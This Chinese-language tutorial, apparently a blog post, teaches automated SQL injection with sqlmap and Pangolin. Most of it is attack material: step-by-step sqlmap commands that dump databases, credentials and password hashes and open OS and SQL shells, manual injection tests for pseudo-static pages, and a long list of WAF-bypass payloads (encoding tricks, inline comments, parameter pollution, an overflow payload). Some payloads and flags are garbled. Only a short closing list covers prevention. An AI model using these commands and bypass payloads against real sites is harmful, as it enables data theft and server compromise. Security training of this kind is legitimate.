SQL注入-自动注入（sqlmap、pangolin）

1、sqlmap自动注入

Windows运行sqlmap命令：python sqlmap.py 命令语句
Linux运行sqlmap命令：sqlmap 命令语句

1.1Sqlmap工具简介

Sqlmap是一个开放码源的渗透测试工具，它可以自动检测和利用sql注入漏洞，并且它在SecTools.ORG注入工具分类里位列第一名。
Sqlmap是基于python编写，是跨站台的，任意一台安装了python的操作系统都可以使用它。Sqlmap特点如下：
Sqlmap支持的数据库有：MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。
sql注入类型包括sql盲注、union注入、显错式注入、时间注入、盲推理注入和堆查询注入等技术。
支持枚举用户、密码哈希、权限、角色、数据库、表和列。
支持执行任意命令。
自动识别密码加密方式，并且可以使用字典解密。
支持数据导出功能。

1.2使用Sqlmap

已知存在注入点http://www.xxser.com/user.jsp?id=1，使用sqlmap对其提取管理员数据，具体步骤如下：

1. 判断是否存在注入点：sqlmap.py -u “http://www.xxser.com/user.jsp?id=1”；使用-u参数指定url，如果url存在注入点，将会显示出web容器、数据库版本基本信息。
2. 获取数据库：sqlmap.py -u “http://www.xxser.com/user.jsp?id=1” --dbs ;使–dbs参数读取数据库，会显示所有数据库的名字。
3. 查看当前应用程序所用数据库：sqlmap.py -u “http://www.xxser.com/user.jsp?id=1” --current-db ;使用current-db参数列出当前应用程序所使用的数据库。
4. 列出指定数据库的所有表：sqlmap.py -u “http://www.xxser.com/user.jsp?id=1” --table -D “数据库名” ；使用table参数获取数据库表，-D参数指定数据库。
5. 读取指定表中的字段名称：sqlmap.py -u “http://www.xxser.com/user.jsp?id=1” --columns -T “表名” -D “数据名”；使用–columns参数列取字段名。
6. 读取指定字段内容：sqlmap.py -u “http://www.xxser.com/user.jsp?id=1” --dump -C “字段名1,字段名2…” -T “表名” -D “数据库名”；–dump参数意为转存数据，-C参数指定字段名称，-T参数指定表名（如果表名是数据库关键字，建议加上[]，如user->[user]），-D指定数据库名称。
   在读取数据后，sqlmap将会把数据转存到SQLMap/output/目录下，文件以“Table（表名）.cvs”保存。
   通过以上6个步骤，sqlmap可以轻松地对存在注入漏洞的url读取数据。

下面是一些常用的参数用法：
（1） 测试注入点权限
Sqlmap.py -u [url] --privileges //测试所有用户的权限
sqlmap.py -u [url] - -U sa //测试sa用户的权限，sa可以改成其他用户
（2） 执行shell命令
sqlmap.py -u [url] --os-cms=”net user” //执行net user命令
sqlmap.py -u [url] --os-shell //系统交互的shell
（3） 执行sql命令
sqlmap.py -u [url] --sql-shell //返回sql交互的shell，可以执行sql命令
sqlmap.py -u [url] --sql-query=”sql”
（4） POST提交方式
sqlmap.py -u [url] --data “POST参数”l
（5） 显示详细等级
sqlmap.py -u [url] --dbs -v 1
-v参数包含以下七个等级：
0、只显示python错误以及严重的信息。
1、同时显示基本信息和警告信息。（默认）
2、同时显示debug调试信息。
3、同时显示注入的payload（有效载荷）。
4、同时显示HTTP请求。
5、同时显示HTTP响应头。
6、同时显示HTTP响应页面的内容。
（6） 注入HTTP请求
Sqlmap.py -r head.txt --dbs //head.txt内容为HTTP请求
head.txt内容如下：
POST /login.php HTTP/1.1
Host:www.sebug.org
User-Agent:Mozilla/5.0

Username=admin&password=admin888
（7） 直接连接到数据库
Sqlmap.py -d “mysql://admin:admin@192.168.1.8:3306/testdb” --dbs
（8） 注入等级
Sqlmap.py -u [url] --level 3
（9） 将注入语句插入到指定位置
Sqlmap.py -u http://www.xxser.com/id/2*.html –dbs
有些网站采用了伪静态的页面，这时再使用sqlmap注入则无能为力了，因为sqlmap无法识别哪里是对服务器提交的请求参数，所以sqlmap提供了“”参数，将sql语句插入到指定位置，这一用法常用于伪静态注入。
同样在使用-r参数对HTTP请求注入时，也可以直接在文本框中插入号，如：POST /login.php HTTP/1.1
Host:www.sebug.org
User-Agent:Mozilla/5.0

Username=admin*&password=admin888 //注入username字段

伪静态扩展知识：伪静态是一种表面上看似是静态网页（以.html、.htm等结尾），不存在任何的数据交互，却其实是动态网页，存在数据交互的网站，具有这种特性的网页被称为“伪静态网页”。我们看到的伪静态网页其实是经过处理的，将动态网页的id等参数通过URL重写来隐藏，让查看者以为是静态网页。

在平时的测试过程中我们经常会看到这样一类奇特的地址：http://xxx.xxx.xx.xx:xxx/test.php/id/1.html
（原型一般为：http://xxx.xxx.xx.xx:xxx/test.php?id=1 ）。像这种类型的网址URL，往往是一种伪静态网页，遇到这种情况可以直接对".html"之前的参数加“’”单引号进行判断是否存在注入！
伪静态网页的注入点查找（手工注入判断）与动态页面的判断方法是一样的：
假设url为：http://xxx.xxx.xx.xx:xxx/test.php/1.html
判断步骤：

1. 在网址加上“’”单引号，http://xxx.xxx.xx.xx:xxx/test.php/1’.html，网页不正常显示。
2. 在网址加上“and 1=1”，http://x xx.xxx.xx.xx:xxx/test.php/1 and 1=1.html,网页正常显示。
3. 在网址加上“and 1=2”，http://x xx.xxx.xx.xx:xxx/test.php/1 and 1=2.html,网页不正常显示。
   由此可知该网页为为静态网页，存在sql注入漏洞。

判断一个url是否为为静态网页？
如果看到一个以.html或者.htm结尾的网页，此时可以通过呢在在地址输入框中输入：javascript:alert(document.lastModified)，来得到网页最后的修改时间，如果得到的时间和现在时间一致，此页面就是伪静态，反之是真静态；因为动态页面的最后修改时间总是当前时间，而静态页面的最后修改时间则是它生成的时间。
（10） Sqlmap的一些信息获取
sqlmap -u [url] --users #列数据库用户
sqlmap -u [url] --passwords #数据库用户密码
sqlmap -u [url] --passwords -U root -v 0 #列出指定用户数据库密码
sqlmap -u [url] --cookie “COOKIE_VALUE” #cookie注入
sqlmap -u [url] --data “id=3” #post注入
sqlmap -u [url] -b #获取banner信息
sqlmap -u [url] --reg-read #读取win系统注册表
sqlmap -u [url] --dbs -o “sqlmap.log” #保存进度
sqlmap -u [url] --dbs -o “sqlmap.log” --resume #恢复已保存进度
（11） 使用sqlmap插件
Sqlmap.py -u [url] -temper “space2morehash.py”
Sqlmap自带非常多的插件，可针对注入的sql语句进行编码等操作，插件都保存在sqlmap目录下的temper文件夹中，这些插件通常用来绕过WAF（web application Firewalls 全称为web应用防护系统，waf针对的是应用层）
**Waf扩展知识：**WAF是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一种网络安全产品。WAF可以增大攻击者的攻击难度和攻击成本，但是不是100%安全的。

目前市场上的waf主要有以下几类：

1. 基于硬件waf：绿盟waf；
2. 基于软件waf：以安全狗为代表；
3. 部署在云端的waf：百度加速乐、安全宝等。
   绕过waf的技术可分为以下几类：
4. 大小写混写：
   用于只针对小写或大写的关键字匹配技术，正则表达式/express/i 大小写不敏感即无法绕过。比如拦截了union，那就使用Union、UnIoN等等绕过。
5. 替换关键字：
   a. 关键组双写：大小写转化无法绕过，正则表达式会替换或删除select、union这些关键字，如果只匹配一次就很容易绕过。比如：UNIunionON SELselectECT 1,2,3,4
   b. 同价词替换：
   and 和or有可能不能使用，可以试试&&和||能不能使用；
   =不能使用的情况，可以考虑尝试<、>，因为如果不小于又不大于，那就是等于了；
   空格不能使用（常见），可以使用如下符号进行替换：%20 %09 %0a %0b %0c %0d %a0 //。
   【注释】 在mysql中%0a是换行，可以代替空格，这个方法也可以部分绕过最新版本的安全狗。而在sqlserver中可以用//来代替空格。
   c. 特殊字符拼接：把特殊字符拼接起来绕过WAF的检测，比如在Mysql中，可以利用注释/**/来绕过，在mssql中，函数里面可以用+来拼接。
6. 使用编码：
7. url编码：在Chrome中输入一个连接，非保留字的字符串浏览器会对其URL编码，如空格变为%20、单引号%27、左括号%28、右括号%29等。普通的URL编码可能无法实现绕过，还存在一种情况URL编码只进行了一次过滤，可以用两次编码绕过：
   page.php?id=?id=1//UNION//SELECT
   经过两次解码:
   page.php?id=1%252f%252a*/UNION%252f%252a*/SELECT
8. 十六进制编码：
9. Unicode编码：常见的几个符号的Unicode编码：
   单引号: %u0027
   空格：%u0020
   左括号：%u0028
   右括号：%u0029
10. 使用注释
    常见的用于注释的符号：//, – , /**/, #, --+,-- -, ;，–a
11. 普通注释：z.com/index.php?page_id=-15 %55nION//%53ElecT 1,2,3,4
    ’union%a0select pass from users#
    //在构造得查询语句中插入注释，规避对空格的依赖或关键字识别。#、–+用于终结语句的查询。
12. 内联注释：它有一个特性/!/只有MySQL能识别(/！/表示注释里面的语句会被执行)。
    index.php?page_id=-15 /!UNION/ /!SELECT/ 1,2,3
    ?page_id=null%0A///!50000%55nIOn//yoyu/all/**/%0A/!%53eLEct/%0A/nnaa/+1,2,3,4…
    两个示例中前者使用内联注释，后者还用到了普通注释。使用注释一个很有用的做法便是对关键字的拆分，要做到这一点后面讨论的特殊符号也能实现，当然前提是包括/、*在内的这些字符能正常使用。
13. 参数污染：HPP（HTTP Parameter Polution）又称重复参数污染，最简单的就是：?uid=1&uid=2&uid=3。
14. 缓冲区溢出：缓冲区溢出用于对付WAF，有不少WAF是C语言写的，而C语言自身没有缓冲区保护机制，因此如果WAF在处理测试向量时超出了其缓冲区长度，就会引发bug从而实现绕过。
    ?id=1 and (select 1)=(Select 0xA1000)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
    0xA1000指0xA后面”A"重复1000次，一般来说对应用软件构成缓冲区溢出都需要较大的测试长度，这里1000只做参考，在某些情况下可能不需要这么长也能溢出。
15. 性能因素
16. 整合绕过

此外，sqlmap还存在很多参数，详解可参照官方文档：http://github.com/sqlmapproject/sqlmap/wiki/Usages

2、Pangolin自动注入

Pangolin(穿山甲Sql注入工具)是一款十分优秀的网站安全测试工具，是目前已有的Sql注入工具中最好的之一。

Pangolin特点如下：
●全面的数据库支持，支持32位/64位Windows NT/2000/XP/2003/Vista/2008/win7系统，包括Access,DB2、Informix、Microsoft SQL Server 2000、Microsoft SQL Server 2005、Microsoft SQLServer2008、Mysql、Oracle、PostgreSQL、Sqlite3、Sybase等数据库类型。
●自动关键字分析能够减少人为操作，且更判断结果准确。
●预登陆功能，在需要验证的情况下照样注入。
●支持HTTPS。
●自定义HTTP标题头功能。
●丰富的绕过防火墙过滤功能。
●数据导出功能。
●测试过程简单、易操作
●注入站（点）管理功能
●代理支持
Pangolin与sqlmap相比，pangolin有用更人性化的GUI设计，易上手。Pangolin只是一个注入验证利用工具，不是一个web漏洞扫描软件，因此不能用它来做整网站的扫描，它也不支持注入目录便利等工具。

3、防止SQL注入

1、严格的数据类型
2、特殊字符转义
3、使用预编译语句
4、框架技术
5、存储过程